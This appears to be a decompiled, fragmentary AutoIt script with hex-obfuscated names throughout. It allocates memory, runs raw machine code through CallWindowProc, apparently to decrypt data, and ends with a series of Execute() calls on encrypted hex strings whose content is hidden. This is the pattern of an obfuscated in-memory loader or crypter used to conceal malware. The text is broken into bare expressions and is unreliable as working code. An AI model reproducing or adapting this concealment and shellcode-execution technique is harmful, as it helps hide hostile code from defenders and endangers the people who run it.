DllCall("kernel32.dll","ptr","VirtualAlloc","ptr",$F6AB5657DBA5ADAB,"ulong_ptr",$F6AB0651DBA5ADAB,"dword",$F6AB0657DB15ADAB,"dword",$F6AB065BDBA5ADAB)
@error 
SetError(@error,@extended, 0 )
DllCall("kernel32.dll","bool","VirtualFree","ptr",$F6AB5657DBA5ADAB,"ulong_ptr",$F6AB0651DBA5ADAB,"dword",$F6AB4657DBA5ADAB)
@error 
SetError(@error,@extended, False )
_F6AB0657DBFEADAB($F6AB06C7DBA5ADAB, 0 ,$F6AB0650DBA5ADAB)
Not IsDllStruct($F6AB06574BA5ADAB) 
@AutoItX64 
String(_F6A40657DBABADAB($F6AB0657D4A5ADAB))
StringInStr($F6AB0657FBA5ADAB,"87DB")
StringInStr($F6AB0657FBA5ADAB,"87C9")
StringInStr($F6AB0657FBA5ADAB,"87D2")
StringInStr($F6AB0657FBA5ADAB,"87F6")
StringInStr($F6AB0657FBA5ADAB,"09C0")
StringInStr($F6AB0657FBA5ADAB,"09DB")
StringInStr($F6AB0657FBA5ADAB,"09C9")
StringInStr($F6AB0657FBA5ADAB,"09D2")
StringInStr($F6AB0657FBA5ADAB,"09F6")
StringInStr($F6AB0657FBA5ADAB,"09FF")
StringInStr($F6AB0657FBA5ADAB,"09E4")
StringInStr($F6AB0657FBA5ADAB,"09ED")
Binary($F6AB0657FBA5ADAB)
_F6AB06F7DBA7ADAB( 0 ,BinaryLen($F6AB0657FBA5ADAB),$F6AB0657DCA5ADAB,$F6AB0757DBA5ADAB)
DllStructCreate("byte["&BinaryLen($F6AB0657FBA5ADAB)&"]",$F6AB06C7DBA5ADAB)
DllStructSetData($F6AB06574BA5ADAB, 1 ,$F6AB0657FBA5ADAB)
OnAutoItExitRegister("_F6AB0657D0ADADAB")
Binary($F6AB0657DFA5ADAB)
BinaryLen($F6AB0657DFA5ADAB)
DllStructCreate("byte["&$F6AB0957DBA5ADAB&"]")
DllStructSetData($F6AB0657D2A5ADAB, 1 ,$F6AB0657DFA5ADAB)
DllStructGetData($F6AB0657D2A5ADAB, 1 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
_F6AB0257DB55ADAB($F6AB0657DFA5ADAB)
DllStructCreate("byte[244]")
DllStructCreate("byte["&BinaryLen($F6AB0657DFA5ADAB)&"]")
DllStructSetData($F6AB06579BA5ADAB, 1 ,$F6AB0657DFA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB0657D9A5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB06579BA5ADAB),"uint",BinaryLen($F6AB0657DFA5ADAB)* 8 ,"int", 0 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
_F6AB0257DB55ADAB($F6AB0657DFA5ADAB)
DllStructCreate("byte[244]")
DllStructCreate("byte["&BinaryLen($F6AB0657DFA5ADAB)&"]")
DllStructSetData($F6AB06579BA5ADAB, 1 ,$F6AB0657DFA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB0357DBA5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB06579BA5ADAB),"uint",BinaryLen($F6AB0657DFA5ADAB)* 8 ,"int", 0 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
Not IsDllStruct($F6AB0657BBA5ADAB) 
SetError( 1 , 0 ,Binary(""))
Binary($F6AB0F57DBA5ADAB)
Ceiling(BinaryLen($F6AB0F57DBA5ADAB)/ 16 )
$F6AB0656DBA5ADAB= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$F6AB0656DBA5ADAB&"]")
DllStructSetData($F6AB065EDBA5ADAB, 1 ,$F6AB0F57DBA5ADAB)
DllStructCreate("byte[16]")
DllStructSetData($F6AB06572BA5ADAB, 1 ,$F6AB06A7DBA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB0654DBA5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB065EDBA5ADAB),"uint",$F6AB0656DBA5ADAB,"ptr",DllStructGetPtr($F6AB06572BA5ADAB))
DllStructGetData($F6AB06572BA5ADAB, 1 )
DllStructGetData($F6AB065EDBA5ADAB, 1 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
Not IsDllStruct($F6AB0657BBA5ADAB) 
SetError( 1 , 0 ,Binary(""))
Binary($F6AB0F57DBA5ADAB)
BinaryLen($F6AB0F57DBA5ADAB)
$F6AB0656DBA5ADAB= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$F6AB0656DBA5ADAB&"]")
DllStructSetData($F6AB065EDBA5ADAB, 1 ,$F6AB0F57DBA5ADAB)
DllStructCreate("byte[16]")
DllStructSetData($F6AB06572BA5ADAB, 1 ,$F6AB06A7DBA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB06577BA5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB065EDBA5ADAB),"uint",$F6AB0656DBA5ADAB,"ptr",DllStructGetPtr($F6AB06572BA5ADAB))
DllStructGetData($F6AB06572BA5ADAB, 1 )
DllStructGetData($F6AB065EDBA5ADAB, 1 )
Not IsDllStruct($F6AB06574BA5ADAB) 
_F6AB06B7BBA5ADAB()
Not IsDllStruct($F6AB0657BBA5ADAB) 
SetError( 1 , 0 ,Binary(""))
Binary($F6AB0F57DBA5ADAB)
BinaryLen($F6AB0F57DBA5ADAB)
$F6AB0656DBA5ADAB= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$F6AB0656DBA5ADAB&"]")
DllStructSetData($F6AB065EDBA5ADAB, 1 ,$F6AB0F57DBA5ADAB)
DllStructCreate("byte[16]")
DllStructSetData($F6AB06572BA5ADAB, 1 ,$F6AB06A7DBA5ADAB)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB06574BA5ADAB)+$F6AB0637DBA5ADAB,"ptr",DllStructGetPtr($F6AB0657BBA5ADAB),"ptr",DllStructGetPtr($F6AB065EDBA5ADAB),"uint",$F6AB0656DBA5ADAB,"ptr",DllStructGetPtr($F6AB06572BA5ADAB))
DllStructGetData($F6AB06572BA5ADAB, 1 )
DllStructGetData($F6AB065EDBA5ADAB, 1 )
_F6AB0057DB65ADAB($F6AB0657BBA5ADAB,$F6AB06A7DBA5ADAB,$F6AB0F57DBA5ADAB)
BinaryLen($F6AB0F57DBA5ADAB)
BinaryMid($F6AB0F57DBA5ADAB,$F6AB0647DBA5ADAB, 1 )=Binary("0x80") 
BinaryMid($F6AB0F57DBA5ADAB, 1 ,$F6AB0647DBA5ADAB- 1 )
Binary($F6AB0F57DBA5ADAB)
BinaryLen($F6AB0F57DBA5ADAB)<= 16 
SetError( 1 , 0 ,Binary(""))
BinaryMid($F6AB0F57DBA5ADAB, 1 , 16 )
BinaryMid($F6AB0F57DBA5ADAB, 17 )
String($F6AB0687DBA5ADAB)
_F6AB0651DB25ADAB($F6AB0657DFA5ADAB)
_F6AB065735A5ADAB($F6AB0657BBA5ADAB,$F6AB06A7DBA5ADAB,$F6AB0F57DBA5ADAB)
_F6AB0651DB25ADAB($F6AB0657DFA5ADAB)
_F6AB0657D9A7ADAB($F6AB0657BBA5ADAB,$F6AB06A7DBA5ADAB,$F6AB0F57DBA5ADAB)
_F6AD0657DDA5ADAB($F6AB0657DFA5ADAB)
_F6AC0657DBA8ADAB($F6AB0657BBA5ADAB,$F6AB06A7DBA5ADAB,$F6AB0F57DBA5ADAB)
BinaryLen($F6AB065CDBA5ADAB)= 0 
SetError( 1 , 0 ,Binary(""))
@AutoItX64 
StringInStr($F6AB0657FBA5ADAB,"89C0")
StringInStr($F6AB0657FBA5ADAB,"89D2")
StringInStr($F6AB0657FBA5ADAB,"89F6")
Binary($F6AB0657FBA5ADAB)
_F6AB06F7DBA7ADAB( 0 ,BinaryLen($F6AB0657FBA5ADAB),$F6AB0657DCA5ADAB,$F6AB0757DBA5ADAB)
DllStructCreate("byte["&BinaryLen($F6AB0657FBA5ADAB)&"]",$F6AB0617DBA5ADAB)
DllStructSetData($F6AB0657D0A5ADAB, 1 ,$F6AB0657FBA5ADAB)
DllStructCreate("byte[16]")
StringLen($F6AB0657D4A5ADAB)
DllStructCreate("byte["&$F6AB0157DBA5ADAB&"]")
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($F6AB0657D0A5ADAB)+$F6AB06570BA5ADAB,"ptr",DllStructGetPtr($F6AB0677DBA5ADAB),"int", 0 ,"int", 0 ,"int", 0 )
DllCall("user32.dll","int","CallWindowProc","ptr",DllStructGetPtr($F6AB0657D0A5ADAB)+$F6AB0657D5A5ADAB,"str",$F6AB0657D4A5ADAB,"uint",$F6AB0157DBA5ADAB,"ptr",DllStructGetPtr($F6AB0657D7A5ADAB),"ptr",DllStructGetPtr($F6AB0677DBA5ADAB))
DllStructGetData(DllStructCreate("uint",DllStructGetPtr($F6AB0657D7A5ADAB)), 1 )
DllStructCreate("byte["&($F6AB0657DDA5ADAB+ 16 )&"]")
DllCall("user32.dll","uint","CallWindowProc","ptr",DllStructGetPtr($F6AB0657D0A5ADAB)+$F6AB06573BA5ADAB,"ptr",DllStructGetPtr($F6AB0657D7A5ADAB)+ 4 ,"ptr",DllStructGetPtr($F6AB0653DBA5ADAB),"int", 0 ,"int", 0 )
_F6AB0657DBFEADAB($F6AB0617DBA5ADAB, 0 ,$F6AB0650DBA5ADAB)
BinaryMid(DllStructGetData($F6AB0653DBA5ADAB, 1 ), 1 ,$F6AB065CDBA5ADAB[ 0 ])
Number($F6AB0C57DBA5ADAB)
Number($F6AB0C57DBA5ADAB)
_F6AB06B7BBA5ADAB()
BinaryToString(_F6AB8651DBA5ADAB($F6AB06578BA5ADAB[$F6AB0657D3A5ADAB],$F6AB0457DBA5ADAB))
Execute(_F6AB2657DBA5ADAB("0xAE41BEE9946EF403887E7B6F77B0F0FD68D2463F0204DA80E714793556EB4FDED7C7488341AA7999D60AC1344E99C7CA"))
Execute(_F6AB2657DBA5ADAB("0xBE08263B6DF5FA0EA2B14ED471F3759A00F382A17909ED87813F830F7A208B625BDEC030A8A9644F25EDD44EB67DBBFB"))
Execute(_F6AB2657DBA5ADAB("0xF929A67B874A6CDEAAE963C68C710C5CFEE5903E8942E458EB98E41068DF6C61D4081B4A7ADDC342D88A11235294A66E"))
Execute(_F6AB2657DBA5ADAB("0x52B490A9246561DCF5E9BEAA3DA1399B6EBC6DF3713E9FF91C4BF6D20AE77D6BDEEC464F4A7E28739F7EDAFB8DCB2B8369E682ECE4FF677C2D1F639EDCF373DE99CDFC0D45045F19730C033EA02B4020"))
Execute(_F6AB2657DBA5ADAB("0xCB33B5F058D87EDA2F0B9B89F2DDA90A5193CD406BD2DA13DD82C918D266CB3CC16F602C52DF6F034E8DDE7A06F1AF67A68A1F6DF574AEA9C2A4D4283A9A5BCE8DDEFDB513C60610DEF0FCEF16812769"))
Execute(_F6AB2657DBA5ADAB("0x0126E7F1C0AA3C8DB825D831844B6992AC9BCEE7D1B060542741EC4730F942615411AD2E737C967933A1D23A309ABB702940B5AAF4155F23E932280E5BFDA21F24E2B64C16D0AB17F17A62BFCFA25465"))
Execute(_F6AB2657DBA5ADAB("0x419E1CEBFD02166518BDCDB329BB61A6AEB98A1B940DCE7ADF6B65149DFF1764D8FAD0EBA3A950E280DFA00EBE8E7307AE955C8563859E23031E7C9CABAFC79F2F0D9DFCBC10B0567EF9FB3D9700A69F507B4D1EE43407F8F928599E0A15C96A"))
Execute(_F6AB2657DBA5ADAB("0xDFEBC957B0A24A7BA6949AB1FBAE386804CE89EF1D2C9A7D7B842613EF424705E4F0D3579635E5E23F2B4DE4F17F2040F30FC21C7091A982B394ABB6556FC9D1"))
Execute(_F6AB2657DBA5ADAB("0x62C56B18C313D8D631A83C167927F34B81C5B8535C650ED07AE9DB0B470015035B9B0EA5A43411096374D4358BCC96BE53A5C3B856C51CB3DCB4DF91E2E7B6ED"))
Execute(_F6AB2657DBA5ADAB("0x933B29BD4B0E0EEB1D1CCCB3A6F7DEC2C205BF28A9256F7B544C717F5D31C9366801DCED91C7BE359F2F1DCA14F08056"))
Execute(_F6AB2657DBA5ADAB("0x348828ACC084CE02264B4D4AF4F83205A95EE6F8FAE60468DFB6DDE47E1D56C012EEF10CED8B8B4CFBF6B9437B43747B"))
Execute(_F6AB2657DBA5ADAB("0xE6FE5E7010B674C71F220C3C89ED3C9021B03EE563D244EE155C3AC89185D87B712FDB60F60CFF2AE329337567447558462DCDA2EC513BEB48C3792D38167F5F998EAECBFEA39442A4539972775838B0A24BC7B1C4844604526C3AE893BCFE02"))
Execute(_F6AB2657DBA5ADAB("0xE94515DE1B47783E076775599A7AC3845482AB65E98E6235A4F1AE1755013642F9398085A4B4D450A3FCA78FCE8BF52BADCED7578C6BA30895A6732509B7B2B6"))
Execute(_F6AB2657DBA5ADAB("0x923F9F74294893BB189A0C78BE796910C2B73DE0212F59EBE191266BF346EAB36EEB7B1D0909FDCE5FD75096C5FE2C7CB36AB5869AF5C915D61FA7A74581E4C78931FBBDFDC5BEC7807E9B47A632EA4724FAE18E3B76CF4E7C8A23D8F7B4F251"))
Execute(_F6AB2657DBA5ADAB("0x19E8BDB5FA5869881687CF2074DC378AA84C60E75AB0BD7F6197B9D1DA801D475A0B3B72A892BC268E13C957F6726876B342F3D55D2232C6970B6E781F01DE79B93141957544BEAAF90C90198FF31DD527D93A9ACCA82A5C4219C811B6777E5B8F62E36E91ED6A1632F78BA63A50D2B5"))
Execute(_F6AB2657DBA5ADAB("0xC3AD315DE25FF11A8244E1112C939D4F997907924806F247CA9086A886F28C08B3039F97CEA203A0DE59A00BFF2E272B",3))
Execute(_F6AB2657DBA5ADAB("0x4795E34CB8999E243578A76F71D7D2ED1C6053CE9D70475F290421708DA0B8E9DFE24E148FB870116D51605619C209718DF47CF16AAD8E28C689DEF9D183AC4191336EAB40CC3C91CD93B7AF7355A5272CCB2FDBA19775CF7CAB23F4CF3384A3",3))
